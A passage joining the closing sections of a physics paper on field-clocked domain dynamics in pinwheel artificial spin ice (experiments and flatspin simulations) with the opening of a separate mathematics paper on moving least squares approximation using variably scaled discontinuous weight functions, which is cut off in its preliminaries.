confirmed by imaging a fully polarized ensemble (fully bright contrast (leftwards), as in snapshot \(t=0\) of Fig. 9) and the absence of remaining image translation in the PEEM (indicating a demagnetized yoke). After initialization, we perform steps of the clock protocols by alternating the application of clock pulses \(A\), \(B\), \(a\) or \(b\). Each _step_ of a clock protocol comprises at least one _clock pulse_ (ramping the applied field to \(\mathbf{H}_{i}\), holding the max field value, ramping down to zero applied field), and a magnetic contrast image acquisition. The value of \(H\) that defines the \(\mathbf{H}_{i}\) magnitudes is \(62\,\mathrm{mT}\) for the unipolar clocking, and \(75\,\mathrm{mT}\) for the bipolar clocking. After applying the first cycle of a clock protocol, before imaging, we shift the image, using the electron microscope optics, to re-center the ensemble, compensating for a small remanent magnetization in the yoke. We carry out multiple cycles, each consisting of applying clock pulses and capturing an image, while maintaining the same image shift throughout. In addition to the growth and reversal protocols, we conduct a control experiment by applying repeated clock pulses of \(A\) and \(B\) separately. ### flatspin simulations Numerical simulations were done using flatspin, a large-scale ASI simulator [33]. flatspin approximates each nanomagnet as a point dipole with position \(\mathbf{r}_{i}\) and orientation \(\theta_{i}\). Each dipole then has two possible magnetization directions along \(\theta_{i}\), i.e., a binary macrospin \(s_{i}\in\{-1,+1\}\). Each spin \(i\) is influenced by a total field \(\mathbf{h}_{i}=\mathbf{h}_{\mathrm{dip}}^{(i)}+\mathbf{h}_{\mathrm{ext}}^{(i )}+\mathbf{h}_{\mathrm{th}}^{(i)}\), where \(\mathbf{h}_{\mathrm{dip}}^{(i)}\) is the total dipolar field from neighboring magnets, \(\mathbf{h}_{\mathrm{ext}}^{(i)}\) is a global or local external field, and \(\mathbf{h}_{\mathrm{th}}^{(i)}\) is a stochastic magnetic field representing thermal fluctuations in each magnetic element. The total dipolar field is given by the magnetic dipole-dipole interaction, \[\mathbf{h}_{\mathrm{dip}}^{(i)}=\alpha\sum_{j\neq i}\frac{3\mathbf{r}_{ij}( \mathbf{m}_{j}\cdot\mathbf{r}_{ij})}{|\mathbf{r}_{ij}|^{5}}-\frac{\mathbf{m}_ {j}}{|\mathbf{r}_{ij}|^{3}}, \tag{1}\] where \(\mathbf{r}_{ij}=\mathbf{r}_{i}-\mathbf{r}_{j}\) is the distance vector from spin \(i\) to \(j\), and \(\alpha\) scales the dipolar coupling strength between spins. The coupling strength \(\alpha\) is given by \(\alpha=\frac{\mu_{0}M}{4\pi a^{3}}\), where \(a\) is the lattice spacing, \(M\) is the net magnetic moment of a single magnet, and \(\mu_{0}\) is the vacuum permeability. Nanomagnet switching (magnetization reversal) occurs if the total field is directed against the current magnetization \(\mathbf{m}_{i}\) and the magnitude of the field exceeds the coercive field \(h_{\mathrm{c}}\). flatspin employs a generalized Stoner-Wohlfarth model, where \(h_{\mathrm{c}}\) depends on the angle of the total field \(\mathbf{h}_{i}\) with respect to the magnet orientation. Associated with each magnet is a switching astroid, which describes \(h_{\mathrm{c}}\) in terms of the parallel (easy axis) and perpendicular (hard axis) component of the total field, \(\mathbf{h}_{\parallel}\) and \(\mathbf{h}_{\perp}\). The shape of the switching astroid is described by the equation \[\left(\frac{h_{\parallel}}{bh_{k}}\right)^{2/\gamma}+\left(\frac{h_{\perp}}{ ch_{k}}\right)^{2/\beta}=1, \tag{2}\] where \(h_{k}\) denotes the coercive field along the hard axis. The parameters \(b\), \(c\), \(\beta\), and \(\gamma\) adjust the shape of the astroid: \(b\) and \(c\) define the height and width, respectively, while \(\beta\) and \(\gamma\) adjust the curvature of the astroid at the easy and hard axis, respectively. Astroid parameters are typically tuned to obtain a shape that agrees with results from micromagnetic simulations. Fabrication imperfections are modelled as variation in the coercive fields \(h_{k}^{(i)}\), which are sampled from a normal distribution \(\mathcal{N}(h_{k},\sigma)\), where \(\sigma=k_{\text{disorder}}\cdot h_{k}\) and \(k_{\text{disorder}}\) is a user-defined parameter. Dynamics are modeled using a deterministic single spin flip strategy. At each simulation step, the total magnetic field \(\mathbf{h}_{i}\) is calculated. Next, we obtain a list of spins that _may_ flip, according to the switching astroid. Finally, the spin which is _furthest outside its switching astroid_ is flipped. The dipolar fields are recalculated after every spin flip, and the above process is repeated until there are no more flippable spins. This relaxation process is performed with constant external and thermal fields. In this work, a global external field is used (\(\mathbf{h}_{\text{ext}}^{(i)}=\mathbf{h}_{\text{ext}}\)), and thermal fluctuations are assumed to be negligible (\(\mathbf{h}_{\text{th}}^{(i)}=0\)). The coupling strength \(\alpha=0.0013\) was estimated to match the experimental results from the \(50\times 50\) fabricated pinwheel sample (see Methods). The value of \(\alpha=0.0013\) is lower than predicted by theory (\(\alpha\approx 0.0025\)), which is likely due to demagnetizing oxidation of the permalloy. A partially oxidized nanomagnet will have a reduced magnetic moment and a smaller effective size as the surface layer is no longer ferromagnetic. The smaller \(30\times 30\) sample used in Fig. 6 had a slightly larger magnet spacing and \(\alpha=0.0012\) was used in this case. For the simulation studies, a field strength \(H=76.5\,\mathrm{mT}\) and no disorder was used. Simulations accompanying the experimental results used a slightly lower field strength of \(H=75.8\,\mathrm{mT}\) for Fig. 5 and \(H=75.9\,\mathrm{mT}\) for Fig. 6. Switching parameters were estimated from micromagnetic simulations of a \(220\,\mathrm{nm}\times 80\,\mathrm{nm}\times 25\,\mathrm{nm}\) stadium magnet using mumax[37], namely \(h_{k}=0.2\,\mathrm{T}\), \(b=0.38\), \(c=1\), \(\beta=1.3\), and \(\gamma=3.6\) Other parameters include \(k_{\text{disorder}}=4\%\) and a neighbor distance of 10. ## Supplementary information ### Neighborhood interactions Here we analyse what type of neighbor interactions causes switching to occur selectively along the vertical and \(+45^{\circ}\) domain walls. We consider five different prototype cases shown in Supplementary Fig. 1c: a uniform blue/green (leftwards) domain, and two domains separated by horizontal, vertical, and \(\pm 45^{\circ}\) domain walls (DWs). Within each prototype case, the subject of study is the highlighted blue magnet in the center. The circled insets in the figure show only a limited neighborhood in the center of a larger \(50\times 50\) system which is initialized according to each prototype case. Supplementary Fig. 1a plots the distance to the astroid for the center magnet, as the number of neighbors are increased when calculating the dipolar fields. In other words, we compute the total dipolar field from all magnets within a radius of the Nth nearest neighbor (NN). After adding the total dipolar field to the external clock field \(H_{A}\), the shortest distance to the astroid is calculated. We define astroid distance as positive outside the astroid and negative inside. Astroid distance is plotted for each of the five prototype cases in Supplementary Fig. 1c. With zero neighbors, and hence no dipolar fields, all five cases start at the same point outside the astroid. As the first NNs are included, the cases split into four: the uniform domain and the \(-45^{\circ}\) domain wall enter the astroid. In other words, the dipolar fields from the first NNs stabilize and prevent switching in these two cases. Including also the second NNs causes the horizontal domain wall to enter the astroid. Horizontal domain walls are hence stabilized by 2nd NN interactions. For the Figure 1: Minimum distance to the astroid edge as the neighborhood is increased, for the highlighted blue magnet in the center of each scenario in **c**. In all cases, the clock field \(\mathbf{H}_{A}\) is applied. **a**, distance to the astroid for the highlighted magnet, as the neighborhood is increased when calculating the dipolar fields. **b**, shows a trace of the position within the astroid as the neighborhood is increased. Note that the scenarios all start at the same point (no neighbors), then diverge. horizontal and \(-45^{\circ}\) domain walls, astroid distance does not change significantly as the neighborhood is increased further. For the uniform domain, however, astroid distance increases further as the number of NNs are increased, with significant stabilizing interactions also beyond 9NNs. Next, we consider the two cases where switching _does_ occur, namely the vertical and \(+45^{\circ}\) domain walls. Somewhat curious, the astroid distance for the vertical domain wall appears to stay nearly constant across all NNs. The \(+45^{\circ}\) domain walls travel further outside the astroid due to 1st NN interactions, then the 3rd NN interactions bring it closer to the astroid again, after which it remains at a near-constant distance. Supplementary Fig. 1b shows a trace of the location within the astroid as the NNs are increased. For the vertical domain wall (red line), there is indeed movement due to dipolar interactions, but the movement is exclusively _parallel_ to the astroid edge. Hence, the astroid distance in this case remains constant. For the \(+45^{\circ}\) domain wall (purple line), the movement is purely in the perpendicular (\(h_{\perp}\)) direction for the 1st NN interactions, then purely parallel (\(h_{\parallel}\)) from the 3rd NN fields. An even more detailed picture is provided in Supplementary Fig. 2, where each neighbor magnet is colored according to the contribution of its dipolar field. Specifically, a magnet is colored red (blue) if its dipolar field pushes the center magnet further out of (into) the astroid. The shade of red (blue) represents how much the dipolar field contributes to promote (prevent) switching of the center magnet. A magnet is colored white if its dipolar field has no contribution on the resulting astroid distance. As can be seen in Supplementary Fig. 2, the neighborhood in the uniform domain is dominated by magnets that prevent switching (colored blue), with the highest contribution from the first NNs along the hard axis of the center magnet. The same subset of the NNs are also the primary stabilizing force of the \(-45^{\circ}\) DW. For the horizontal DW case, the dipolar fields from the first NNs cancel out, and it is the second NNs that prevent switching. Figure 2: Neighborhood influence with respect to center magnet. Each scenario depicts the magnetization state (top) and the corresponding influence of the neighbors (bottom). Stronger red signifies that the magnet is biasing the center magnet _towards_ switching, and stronger blue signifies that the magnet is biasing the center magnet _away_ from switching. For the vertial DW, there is an apparent symmetry between neighbors that prevent and promote switching. As a result the vertical DW is not stabilized and hence easily switched. We saw earlier how this is because the dipolar fields are directed parallel to the astroid edge. The \(+45^{\circ}\) DW is the least stable, where \(3/4\) of the first NNs promote switching (colored red). ### Growth and reversal in bipolar clocking During bipolar clocking, domain growth and reversal in a single clock cycle can be observed for several domain wall configurations. Supplementary Fig. 3 shows the time evolution of different types of domain walls, subject to \(aAbB\) clocking. A straightforward example of simultaneous growth and reversal can be seen in Supplementary Fig. 3d, which shows a \(+45^{\circ}\) domain wall. Notice that the first clock pulse \(a\) moves the domain wall one step towards the left, and hence a reversal of the orange/pink domain. However, the subsequent \(A\) pulse immediately undoes this change _and_ moves the domain wall another step towards the right, advancing the domain wall a total of two layers of the sublattice \(L_{a}\) (orange magnets). Next, the \(b\) pulse has no effect, since the pink magnets along the domain wall are stabilized by the dipolar fields from their neighbors. Finally, the \(B\) pulse moves the domain another step towards the right, flipping the next layer of magnets from sublattice \(L_{b}\) (from green to pink). As can be seen, the result is an apparent growth of the orange/pink domain by a single layer along the domain wall. The other domain wall cases in Supplementary Fig. 3 also show simultaneous growth and reversal, but are not discussed in further detail. There is an apparent competition between growth and reversal. For the \(+45^{\circ}\) domain wall discussed earlier, the competition seems to favor growth. However, the situation strongly depends on the particular shape of the domain. Fig. 12 (main text) Figure 3: Bipolar \(aAbB\) clocking of four types of domain walls in pinwheel ASI: **a**, horizontal DW, **b**, vertical DW, **c**, \(-45^{\circ}\) DW and **d**, \(+45^{\circ}\) DW. Each domain wall is initialized to fill the whole \(50\times 50\) system from edge to edge. Each snapshot shows a zoomed-in view of the system, at different points during a clock protocol. (1) shows the initial state. (2-12) show the state during \(aAbB\) clocking. Magnets that change state between snapshots are highlighted by a solid black outline. shows the time evolution of a hexagonal domain subject to \(aAbB\) clocking. As can be seen, the domain both grows horizontally and reverses vertically, and hence gradually changes shape over time. Since vertical domain reversal depends on the curvature of the domain, the process will stop when the domain grows too wide. The domain will continue to grow horizontally, as horizontal domain growth is not dependent on curvature. As a result, domain growth seems to out-compete reversal in this case. The end result is an apparent tendency towards horizontally elongated domains. Figure 4: XMCD-PEEM images of all steps from the bipolar clock protocol series. The time starts at \(t=0\), and is incremented by 1 for each image, with clock pulses indicated by the labels. The black (rightwards) domains grow and change shape as the \(aAbB\) protocol is applied. There are two control series where \(aA\) and \(bB\) are applied, where no change occurs. Note that there is missing data for \(t=33\), but the ensemble was still subjected to the clock pulses. At \(t=39\) we image after each single clock pulse. From \(t=42\) the reverse protocol \(BbAa\) is applied, and the black (rightwards) domains shrink. Note that during the reversal protocol we still image after a final \(A\) or \(B\) pulse, in order to keep a constant image shift. ## S3 Videos **Video 1** Video showing all XMCD-PEEM images from the unipolar clock protocol series. Each frame is labeled by the clock pulse(s) preceding it. The series consists of growth, reversal, re-initialization, control experiment and a second phase of growth. **Video 2** Video showing flatspin simulation of the unipolar clock protocol series. Each frame depicts the clock pulse preceding it. The series consists of growth, reversal, re-initialization and control experiment. **Video 3** Video showing all XMCD-PEEM images from the bipolar clock protocol series. Each frame is labeled by the clock pulse(s) preceding it. The series consists of growth, control experiment and reversal. **Video 4** Video showing flatspin simulation of the bipolar clock protocol series. Each frame depicts the clock pulse preceding it. The series consists of growth, control experiment and reversal. ## Acknowledgments These experiments were performed at the CIRCE beamline at ALBA Synchrotron with the collaboration of ALBA staff. This work was funded in part by the Norwegian Research Council through the IKTPLUSS project SOCRATES (Grant no. 270961) and the TEKNOKONVERGENS project SPrINTER (Grant No. 331821), and in part by the EU FET-Open RIA project SpinENGINE (Grant No. 861618). The Research Council of Norway is acknowledged for the support to the Norwegian Micro- and Nano-Fabrication Facility, NorFab, project number 295864. Simulations were executed on the NTNU EPIC compute cluster[38]. MAN, MF and MWK acknowledge funding from MCIN through grant number PID2021-122980OB-C54 and MWK also acknowledges support through Marie Sklodowska-Curie grant agreement No. 754397 (DOC-FAM) from EU Horizon 2020.
2302.02707
Moving Least Squares Approximation using Variably Scaled Discontinuous Weight Function
Functions with discontinuities appear in many applications such as image reconstruction, signal processing, optimal control problems, interface problems, engineering applications and so on. Accurate approximation and interpolation of these functions are therefore of great importance. In this paper, we design a moving least-squares approach for scattered data approximation that incorporates the discontinuities in the weight functions. The idea is to control the influence of the data sites on the approximant, not only with regards to their distance from the evaluation point, but also with respect to the discontinuity of the underlying function. We also provide an error estimate on a suitable {\it piecewise} Sobolev Space. The numerical experiments are in compliance with the convergence rate derived theoretically.
Mohammad Karimnejad Esfahani, Stefano De Marchi, Francesco Marchetti
2023-02-06T11:20:31Z
http://arxiv.org/abs/2302.02707v1
# Moving Least Squares Approximation using Variably Scaled Discontinuous Weight Function ###### Abstract Functions with discontinuities appear in many applications such as image reconstruction, signal processing, optimal control problems, interface problems, engineering applications and so on. Accurate approximation and interpolation of these functions are therefore of great importance. In this paper, we design a moving least-squares approach for scattered data approximation that incorporates the discontinuities in the weight functions. The idea is to control the influence of the data sites on the approximant, not only with regards to their distance from the evaluation point, but also with respect to the discontinuity of the underlying function. We also provide an error estimate on a suitable _piecewise_ Sobolev Space. The numerical experiments are in compliance with the convergence rate derived theoretically. ## 1 Introduction In practical applications, over a wide range of studies such as surface reconstruction, numerical solution of differential equations and kernel learning [1, 2, 3], one has to solve the problem of reconstructing an unknown function \(f:\Omega\longrightarrow\mathbb{R}\) sampled at some finite set of data sites \(X=\{\mathbf{x}_{i}\}_{1\leq i\leq N}\subset\Omega\subset\mathbb{R}^{d}\) with corresponding data values \(f_{i}=f(\mathbf{x}_{i}),\ 1\leq i\leq N\). Since in practice the function values \(f_{i}\) are sampled at scattered points, and not at a uniform grid, Meshless (or meshfree) Methods (MMs) are used as an alternative of numerical mesh-based approaches, such as Finite Elements Method (FEM) and Finite Differences (FD). The idea of MMs could be traced back to [4]. Afterwards, multivariate MMs existed under many names and were used in different contexts; interested readers are referred to [5] for an overview over MMs. In a general setting, MMs are designed, at least partly, to avoid the use of an underlying mesh or triangulation. The approximant of \(f\) at \(X\) can be expressed in the form \[s_{f,X}(\mathbf{x})=\sum_{i=1}^{N}\alpha_{i}(\mathbf{x})f_{i}. \tag{1}\] One might seek a function \(s_{f,X}\) that interpolates the data, i.e. \(s_{f,X}(\mathbf{x}_{i})=f_{i},\ 1\leq i\leq N\), and in this case \(\alpha_{i}(\mathbf{x})\) will be the _cardinal functions_. However, one might consider a more generalized framework known as _quasi-interpolation_ in which \(s_{f,X}\) only approximates the data, i.e., \(s_{f,X}(\mathbf{x}_{i})\approx f_{i}\). The latter case means that we prefer to let the approximant \(s_{f,X}\) only nearly fits the function values. This is useful, for instance, when the given data contain some noise, or the number of data is too large. The standard approach to deal with such a problem is to compute the Least-Squares (LS) solution, i.e., one minimizes the error (or cost) function \[\sum_{i=1}^{N}[s_{f,X}(\mathbf{x}_{i})-f_{i}]^{2}. \tag{2}\] A more generalized setting of LS is known as the weighted LS MK: requires a reference?, in which (2) turns to \[\sum_{i=1}^{N}[s_{f,X}(\mathbf{x}_{i})-f_{i}]^{2}w(\mathbf{x}_{i}), \tag{3}\] which is ruled by the _weighted_ discrete \(\ell_{2}\) inner product. In practice the role of \(w(\mathbf{x}_{i})\) is to add more flexibility to the LS formulation for data \(f_{i}\) that influence the approximation process, which are supposed, for example, to be affected by some noise. However, these methods are global in the sense that all data sites have influence on the solution at any evaluation point \(\mathbf{x}\in\Omega\). Alternatively, for a fixed evaluation point \(\mathbf{x}\), one can consider only \(n\)-th closest data sites \(\mathbf{x}_{i},\,i=1,\ldots,n\) of \(\mathbf{x}\) such that \(n\ll N\). The _Moving Least-Squares_ (MLS) method, which is a _local_ variation of the classical weighted least-squares technique, has been developed following this idea. To be more precise, in the MLS scheme, for each evaluation point \(\mathbf{x}\) one needs to solve a _weighted least-squares_ problem, minimizing \[\sum_{i=1}^{N}[s_{f,X}(\mathbf{x}_{i})-f_{i}]^{2}w(\mathbf{x},\mathbf{x}_{i}) \tag{4}\] by choosing the weight functions \(w(\mathbf{x},\mathbf{x}_{i}):\mathbb{R}^{d}\times\mathbb{R}^{d}\longrightarrow \mathbb{R}\) to be localized around \(\mathbf{x}\), so that _few_ data sites are taken into account. The key difference with respect to (3) is that the weight function is indeed _moving_ with the evaluation point, meaning that it depends on both the \(\mathbf{x}_{i}\) and \(\mathbf{x}\). Consequently, for each evaluation point \(\mathbf{x}\), a small linear system needs to be solved. Also, one can let \(w(\cdot,\mathbf{x}_{i})\) be a radial function i.e., \(w(\mathbf{x},\mathbf{x}_{i})=\varphi(\|\mathbf{x}-\mathbf{x}_{i}\|_{2})\) for some non-negative univariate function \(\varphi:[0,\infty)\longrightarrow\mathbb{R}\). Doing in this way, \(w(\cdot,\mathbf{x}_{i})\) inherits the translation invariance property of radial basis functions. We mention that (4) could be generalized as well by letting \(w_{i}(\cdot)=w(\cdot,\mathbf{x}_{i})\) moves with respect to a _reference_ point \(\mathbf{y}\) such that \(\mathbf{y}\neq\mathbf{x}\). The earliest idea of MLS approximation technique can be traced back to Shepard's seminal paper [6], in which the author considered the approximation by constants. Later on, the general framework of MLS was introduced by Lancaster and Salkauskas in [7], where they presented the analysis of MLS methods for smoothing and interpolation of scattered data. Afterwards, in [8] the author analyzed the connection between MLS and the Backus-Gilbert approach [9], and showed that the method is effective for derivatives approximations as well. Since then, MLS method showed its effectiveness in different applications [10, 11]. The error analysis of MLS approximation has been provided by some authors, mainly based on the work of Levin [12]. In [13, Chap. 3 & 4] and [14] the author suggested error bounds that take into account the so-called _fill-distance_, whose definition is recalled in Subsection 2.1. Other works focusing on the theoretical aspects of MLS method include [15], in which the authors provided error estimates in \(L_{\infty}\) for the function and its first derivatives in the one dimensional case, then [16], where they generalized this approach to the multi-dimensional case. In both these works, the error analysis is based on the _support_ of the weight functions and not on the fill distance. More recently, in [17] the author obtained an error estimate for MLS approximation of functions that belong to integer or fractional-order Sobolev spaces, which shows similarities to the bound previously studied in [18] for kernel-based interpolation. The MLS method has rarely been used for approximating piecewise-continuous functions, i.e, functions that possess some discontinuities or jumps. In this case, it would be essential that the approximant takes into account the location of the discontinuities. To this end, in this paper we let the weight function be a _Variably Scaled Discontinuous Kernel_ (VSDK) [19]. VSDK interpolant have been employed to mitigate the Gibbs phenomenon, outperforming classical kernel-based interpolation in [21]. Similarly in MLS approximation framework, the usage of VSDK weights allows the construction of data-dependent approximants (as discussed in [12, SS4]) that are able to overcome the performances of classical MLS approximants, as indicated by a careful theoretical analysis and then assessed by various numerical experiments. The paper is organized as follows. In Section 2 we recall necessary notions of the MLS, VSDKs and Sobolev spaces. Section 3 presents the original contribution of this work, consisting in the use of variably scaled discontinuous weights for reconstructing discontinuous functions in the framework of MLS approximation. The error analysis shows that the MLS-VSDKs approximation can outperform classical MLS schemes as the discontinuities of the underlying function are assimilated into the weight function. In Section 4 we discuss some numerical experiments that support our theoretical findings, and in Section 5 we draw some conclusions. ## 2 Preliminaries on MLS and VKs ### Moving Least Squares (MLS) approximation In this introduction to MLS, we resume and deepen what outlined in the previous section. The interested readers are also refereed to [22, Chap. 22]. Let \(\Omega\) be a non-empty and bounded domain in \(\mathbb{R}^{d}\) and \(X\) be the set of \(N\) distinct data sites (or centers). We consider the target function \(f\), and the corresponding function values \(f_{i}\) as defined above. Moreover, \(\mathcal{P}^{d}_{\ell}\) indicates the space of \(d\)-variate polynomials of degree at most \(\ell\in\mathbb{N}\), with basis \(\{p_{1},...,p_{Q}\}\) and dimension \(Q=\binom{\ell+d}{d}\). Several equivalent formulations exist for the MLS approximation scheme. As the standard formulation, the MLS approximant looks for the best weighted approximation to \(f\) at the evaluation point \(\mathbf{x}\) in \(\mathcal{P}^{d}_{\ell}\) (or any other linear space of functions \(\mathcal{U}\)), with respect to the discrete \(\ell_{2}\) norm induced by the weighted inner product \(\langle f,g\rangle_{w_{\mathbf{x}}}=\sum_{i=1}^{N}w(\mathbf{x}_{i},\mathbf{x} )f(\mathbf{x}_{i})g(\mathbf{x}_{i})\). Mathematically speaking, the MLS approximant will be the linear combination of the poly nomial basis i.e., \[s_{f,X}(\mathbf{x})=\sum_{j=1}^{Q}c_{j}(\mathbf{x})p_{j}(\mathbf{x}), \tag{5}\] where the coefficients are obtained by locally minimizing the weighted least square error in (4), which is equivalent to minimizing \(\|f-s_{f}\|_{w_{\mathbf{x}}}\). We highlight that the local nature of the approximant is evident from the fact that the coefficient \(c_{j}(\mathbf{x})\) must be computed for each evaluation point \(\mathbf{x}\). In another formulation of MLS approximation known as the _Backus-Gilbert_ approach, one considers the approximant \(s_{f,X}(\mathbf{x})\) to be a _quasi interpolant_ of the form (1). In this case, one seeks the values of the basis functions \(\alpha_{i}(\mathbf{x})\) (also known as generating or shape functions) as the minimizers of \[\frac{1}{2}\sum_{i=1}^{N}\alpha_{i}^{2}(\mathbf{x})\frac{1}{w(\mathbf{x}_{i}, \mathbf{x})} \tag{6}\] subject to the polynomial reproduction constraints \[\sum_{i=1}^{N}p(\mathbf{x}_{i})\alpha_{i}(\mathbf{x})=p(\mathbf{x}),\quad \text{for all }p\in\mathcal{P}_{\ell}^{d}.\] Such a constrained quadratic minimization problem can be converted to a system of linear equations by introducing Lagrange multipliers \(\boldsymbol{\lambda}(\mathbf{x})=[\lambda_{1}(\mathbf{x}),...,\lambda_{Q}( \mathbf{x})]^{T}\). Consequently (e.g see [13, Corollary 4.4]), the MLS basis function \(\alpha_{i}\) evaluated at \(\mathbf{x}\) is given by \[\alpha_{i}(\mathbf{x})=w(\mathbf{x},\mathbf{x}_{i})\sum_{k=1}^{Q}\lambda_{k}( \mathbf{x})p_{k}(\mathbf{x}_{i}),\quad 1\leq i\leq N, \tag{7}\] such that \(\lambda_{k}(\mathbf{x})\) are the unique solution of \[\sum_{k=1}^{Q}\lambda_{k}(\mathbf{x})\sum_{i=1}^{N}w(\mathbf{x},\mathbf{x}_{i })p_{k}(\mathbf{x}_{i})p_{s}(\mathbf{x}_{i})=p_{s}(\mathbf{x}),\quad 1\leq s \leq Q. \tag{8}\] We observe that the weight function \(w_{i}(\mathbf{x})=w(\mathbf{x},\mathbf{x}_{i})\) controls the influence of the center \(\mathbf{x}_{i}\) over the approximant, so it should be _small_ when evaluated at a point that is far from \(\mathbf{x}\), that is it should decay to zero fast enough. To this end we may let \(w_{i}(\mathbf{x})\) be positive on a ball centered at \(\mathbf{x}\) with radius \(r\), \(B(\mathbf{x},r)\), and zero outside. For example, a compactly supported radial kernel satisfies such a behaviour. Thus, let \(I(\mathbf{x})=\{i\in\{1,\ldots,N\},\|\mathbf{x}-\mathbf{x}_{i}\|_{2}{\leq r}\}\) be the family of indices of the centers \(X\), for which \(w_{i}(\mathbf{x})>0\), with \(|I|=n\ll N\). Only the centers \(\mathbf{x}_{i}\in I\) influence the approximant \(s_{f,X}(\mathbf{x})\). Consequently, the matrix representation of (7) and (8) is \[\boldsymbol{\alpha}(\mathbf{x}) =W(\mathbf{x})P^{T}\boldsymbol{\lambda}(\mathbf{x}),\] \[\boldsymbol{\lambda}(\mathbf{x}) =(PW(\mathbf{x})P^{T})^{-1}\mathbf{p}(\mathbf{x}),\] where \(\mathbf{\alpha}(\mathbf{x})=[\alpha_{1}(\mathbf{x}),...,\alpha_{n}(\mathbf{x})]^{T}\), \(W(\mathbf{x})\in\mathbb{R}^{n\times n}\) is the diagonal matrix carrying the weights \(w_{i}(\mathbf{x})\) on its diagonal, \(P\in\mathbb{R}^{Q\times n}\) such that its \(k\)-th row contains \(p_{k}\) evaluated at data sites in \(I(\mathbf{x})\), and \(\mathbf{p}(\mathbf{x})=[p_{1}(\mathbf{x}),...,p_{Q}(\mathbf{x})]^{T}\). More explicitly the basis functions are given by \[\mathbf{\alpha}(\mathbf{x})=W(\mathbf{x})P^{T}(PW(\mathbf{x})P^{T})^{-1}\mathbf{ p}(\mathbf{x}). \tag{9}\] Moreover, it turns out that the solution of (5) is identical to the solution offered by the Backus-Gilbert approach (see e.g. [13, Chap. 3 & 4]). In the MLS literature, it is known that a local polynomial basis shifted to the evaluation point \(\mathbf{x}\in\Omega\) leads to a more stable method (see e.g. [13, Chap. 4]). Accordingly, we let the polynomial basis to be \(\{1,(\cdot-\mathbf{x}),\ldots,(\cdot-\mathbf{x})^{\ell}\}\), meaning that different bases for each evaluation point are employed. In this case, since with standard monomials basis we have \(p_{1}\equiv 1\) and \(p_{k}(0)=0\) for \(2\leq k\leq Q\), then \(\mathbf{p}(\mathbf{x})=[1,0,...,0]^{T}\). To ensure the invertibility of \(PW(\mathbf{x})P^{T}\) in (9), \(X\) needs to be \(\mathbb{P}_{\ell}^{d}\)-unisolvent. Then as long as \(w_{i}(\mathbf{x})\) is positive, \(PW(\mathbf{x})P^{T}\) will be a positive definite matrix, and so invertible; more details are available in [22, Chap. 22]. Furthermore, thanks to equation (7), it is observable that the behaviour of \(\alpha_{i}(\mathbf{x})\) is heavily influenced by the behaviour of the weight functions \(w_{i}(\mathbf{x})\), in particular it includes continuity and the support of the basis functions \(\alpha_{i}(\mathbf{x})\). Another significant feature is that the weight functions \(w_{i}(\mathbf{x})\) which are singular at the data sites lead to cardinal basis functions i.e., \(\alpha_{i}(\mathbf{x}_{j})=\delta_{i,j}\;i,j=1,...,n\), meaning that MLS scheme interpolates the data (for more details see [12, Theorem 3]). We also recall the following definitions that we will use for the error analysis. 1. A set \(\Omega\subset\mathbb{R}^{d}\) is said to satisfy an **interior cone condition** if there exists an angle \(\Theta\in(0,\pi/2)\) and a radius \(r>0\) so that for every \(\mathbf{x}\in\Omega\) a unit vector \(\xi(\mathbf{x})\) exists such that the cone \[C(\mathbf{x},\xi,\Theta,r)=\{\mathbf{x}+t\mathbf{y}:\mathbf{y}\in\mathbb{R}^{ d},\|\mathbf{y}\|_{2}=1,\cos(\Theta)\leq\mathbf{y}^{T}\xi,t\in[0,r]\}\] is contained in \(\Omega\). 2. A set \(X=\{\mathbf{x}_{1},...,\mathbf{x}_{N}\}\) with \(Q\leq N\) is called \(\mathbb{P}_{\ell}^{d}\)-unisolvent if the zero polynomial is the only polynomial from \(\mathbb{P}_{\ell}^{d}\) that vanishes on \(X\). 3. The **fill distance** is defined as \[h_{X,\Omega}=\sup_{\mathbf{x}\in\Omega}\min_{1\leq j\leq N}\|\mathbf{x}- \mathbf{x}_{j}\|_{2}.\] 4. The **separation distance** \[q_{X}=\frac{1}{2}\underset{i\neq j}{\min}\|\mathbf{x}_{i}-\mathbf{x}_{j}\|.\] 5. The set of data sites \(X\) is said to be **quasi-uniform** with respect to a constant \(c_{qu}>0\) if \[q_{X}\leq h_{X,\Omega}\leq c_{qu}q_{X}.\] ### Sobolev spaces and error estimates for MLS Assume \(k\in\mathbb{N}_{0}\) and \(p\in[1,\infty)\), then the _integer-order_ Sobolev space \(W^{k}_{p}(\Omega)\) consists of all \(u\) with distributional (weak) derivatives \(D^{\boldsymbol{\delta}}u\in L^{p},|\boldsymbol{\delta}|\leq k\). The semi-norm and the norm associated with these spaces are \[|u|_{w^{k}_{p}(\Omega)}{:=}\Big{(}\sum_{|\boldsymbol{\delta}|=k}\|D^{ \boldsymbol{\delta}}u\|_{L^{p}(\Omega)}^{p}\Big{)}^{1/p}\ \,,\qquad\|u\|_{w^{k}_{p}(\Omega)}{:=}\Big{(}\sum_{| \boldsymbol{\delta}|\leq k}\|D^{\boldsymbol{\delta}}u\|_{L^{p}(\Omega)}^{p} \Big{)}^{1/p}. \tag{10}\] Moreover, letting \(0<s<1\), the _fractional-order_ Sobolev space \(W^{k+s}_{p}(\Omega)\) is the space of the functions \(u\) for which semi-norm and norm are defined as \[|u|_{w^{k+s}_{p}(\Omega)}:=\Big{(}\sum_{|\boldsymbol{\delta}|=k}\int_{\Omega} \int_{\Omega}\frac{|D^{\boldsymbol{\delta}}u(\mathbf{x})-D^{\boldsymbol{\delta }}u(\mathbf{y})|^{p}}{|\mathbf{x}-\mathbf{y}|^{d+ps}}\Big{)}^{1/p}\] \[\|u\|_{W^{k+s}_{p}(\Omega)}:=\Big{(}\|u\|_{W^{k}_{p}(\Omega)}{+}|u|_{W^{k+s}_{ p}(\Omega)}\Big{)}^{1/p}.\] Consider certain Sobolev spaces \(W^{k}_{p}(\Omega)\) with the condition that \(1<p<\infty\) and \(k>m+d/p\) (for \(p=1\) the equality is also possible), then according to [18, Theorem 2.12] the sampling inequality \[\|u\|_{W^{m}_{p}(\Omega)}{\leq}\;Ch^{k-m-d(1/p-1/p)_{+}}_{X,\Omega}\|u\|_{W^{k }_{p}}\] holds for a function \(u\) that satisfies \(u(X)=0\), with \(h_{X,\Omega}\) being the _fill distance_ associated with \(X\) and \((\mathbf{y})_{+}=\max\left\{0,\mathbf{y}\right\}\). For more information regarding Sobolev Spaces and sampling inequalities we refer the reader to [23] and [24], respectively. Getting back to the MLS scheme, let \(D^{\boldsymbol{\delta}}\) be a derivative operator such that \(|\boldsymbol{\delta}|{\leq}\;\ell\) (we recall that \(\ell\) is the maximum degree of the polynomials). Under some mild conditions regarding the weight functions, [17, Theorem 3.11] shows 